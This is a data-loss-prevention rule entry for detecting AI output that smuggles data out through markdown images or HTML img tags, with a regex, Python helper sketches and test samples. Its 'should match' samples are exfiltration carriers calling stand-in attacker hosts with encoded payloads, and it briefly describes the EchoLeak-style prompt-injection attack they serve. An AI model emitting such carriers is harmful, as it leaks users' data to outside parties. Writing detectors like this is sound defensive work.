AI Data-Exfiltration Marker

Detects data-exfiltration carriers in AI/LLM output: markdown images or links and HTML img tags whose URL points off-tenant and carries an encoded data payload in the path or query. This is a generic, EchoLeak-style (cf. CVE-2025-32711) markdown/HTML exfiltration-carrier marker: it flags the carrier shape, not the full CVE mechanism, which also involves XPIA (cross-prompt injection attack) evasion and a Teams proxy/CSP bypass.

Type: regex
Engine: universal
Confidence: high
Confidence justification: High (precision-gated). The rule fires on outbound content, so it is tuned for a low false-positive (FP) rate: it requires an external host plus a long encoded payload, and corporate-host and test-text exclusions remove the named FP traps.
Jurisdictions: global
Regulations: OWASP LLM Top 10 2025, NIST AI RMF GenAI Profile
Frameworks: ISO 27001
Data categories: emerging, security
Risk rating: 9
Platform compatibility: Purview: Compatible, GCP DLP: Compatible, Macie: Compatible, Zscaler: Compatible, Palo Alto: Compatible, Netskope: Compatible

Pattern

!\[[^\]]*\]\(\s*https?://[^)\s]+[?#&][^)\s]*=[^)\s]{16,}\)
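
The expression above constrains the URL shape and payload length but contains no host check, so the corporate-host exclusion mentioned in the confidence justification has to be applied somewhere else. A minimal sketch of one way to do that as a post-match filter follows. The capture group around the URL, the CORPORATE_HOST_SUFFIXES allowlist, and the function names are assumptions made for illustration, not part of the rule.

```python
import re
from urllib.parse import urlsplit

# Same expression as in the Pattern section, with one capture group added
# around the URL so the host can be inspected (added for illustration only).
CARRIER = re.compile(
    r"!\[[^\]]*\]\(\s*(https?://[^)\s]+[?#&][^)\s]*=[^)\s]{16,})\)"
)

# Hypothetical allowlist; a real deployment would supply its own tenant hosts.
CORPORATE_HOST_SUFFIXES = ("contoso.sharepoint.com", "contoso.com")


def is_corporate(host: str) -> bool:
    """True if host equals an allowlisted name or is a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(
        host == suffix or host.endswith("." + suffix)
        for suffix in CORPORATE_HOST_SUFFIXES
    )


def external_carriers(text: str) -> list[str]:
    """Return carrier URLs in text whose host is not on the allowlist."""
    hits = []
    for match in CARRIER.finditer(text):
        url = match.group(1)
        host = urlsplit(url).hostname or ""
        if not is_corporate(host):
            hits.append(url)
    return hits
```

Comparing on a dot boundary (rather than a plain suffix test) keeps lookalike hosts such as evilcontoso.com from passing as corporate.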

Corroborative evidence keywords

image, link, markdown, render, AI, artificial intelligence, LLM, large language model, Copilot, chatbot, assistant, agent, prompt, system prompt, tool call, completion, model

Proximity: 300 characters
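
How the keyword list and the proximity value combine depends on the DLP engine. The sketch below shows one plausible reading, assuming case-insensitive whole-word matching and a window of 300 characters measured from each edge of the pattern match. The function name has_corroboration and these matching semantics are assumptions, not documented engine behaviour.

```python
import re

# Keywords copied from the corroborative evidence list above.
KEYWORDS = [
    "image", "link", "markdown", "render", "AI", "artificial intelligence",
    "LLM", "large language model", "Copilot", "chatbot", "assistant", "agent",
    "prompt", "system prompt", "tool call", "completion", "model",
]

PROXIMITY = 300  # characters, from the Proximity field

# Longest keywords first so multi-word phrases are tried before their parts.
KEYWORD_RE = re.compile(
    r"\b(?:"
    + "|".join(re.escape(k) for k in sorted(KEYWORDS, key=len, reverse=True))
    + r")\b",
    re.IGNORECASE,
)


def has_corroboration(text: str, start: int, end: int,
                      window: int = PROXIMITY) -> bool:
    """True if a keyword occurs within `window` characters of text[start:end].

    The matched span itself is excluded, so words inside the carrier
    (for example the alt text) do not count as evidence.
    """
    before = text[max(0, start - window):start]
    after = text[end:end + window]
    return bool(KEYWORD_RE.search(before) or KEYWORD_RE.search(after))
```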

Should match

![logo](https://evil.example.net/c?d=eyJzZWNyZXQiOiJsZWFrZWQtdmFsdWUtMTIzNDU2Nzg5In0) — Markdown image to external host with long base64-like query payload
<img src="https://attacker.test/p?x=QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo"> — HTML img tag to external host with encoded payload

Should not match

![logo](https://contoso.sharepoint.com/sites/team/logo.png) — SharePoint deep link (corporate host, no data payload)
![pixel](https://analytics.example.com/t?id=42) — Analytics URL with short, non-data parameter
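
The samples above can be checked directly against the expression in the Pattern section. The following is a small harness using Python's re module as a stand-in engine, which is an assumption since the target engines may differ in regex dialect. Run this way, the printed expression matches the markdown image sample and rejects both negative samples, but it does not match the HTML img sample. This suggests that img coverage relies on a companion expression not shown in this entry.

```python
import re

# Pattern copied verbatim from the Pattern section.
PATTERN = re.compile(
    r"!\[[^\]]*\]\(\s*https?://[^)\s]+[?#&][^)\s]*=[^)\s]{16,}\)"
)

# Sample strings copied from the "Should match" / "Should not match" lists;
# the dictionary keys are labels invented for this sketch.
SAMPLES = {
    "markdown_image_payload":
        "![logo](https://evil.example.net/c?d="
        "eyJzZWNyZXQiOiJsZWFrZWQtdmFsdWUtMTIzNDU2Nzg5In0)",
    "html_img_payload":
        '<img src="https://attacker.test/p?x='
        'QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo">',
    "sharepoint_deep_link":
        "![logo](https://contoso.sharepoint.com/sites/team/logo.png)",
    "short_analytics_param":
        "![pixel](https://analytics.example.com/t?id=42)",
}


def evaluate(samples: dict) -> dict:
    """Map each sample label to True if PATTERN matches anywhere in it."""
    return {name: PATTERN.search(text) is not None
            for name, text in samples.items()}


if __name__ == "__main__":
    for name, hit in evaluate(SAMPLES).items():
        print(f"{name}: {'match' if hit else 'no match'}")
```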

Collections

AI Threat Classifiers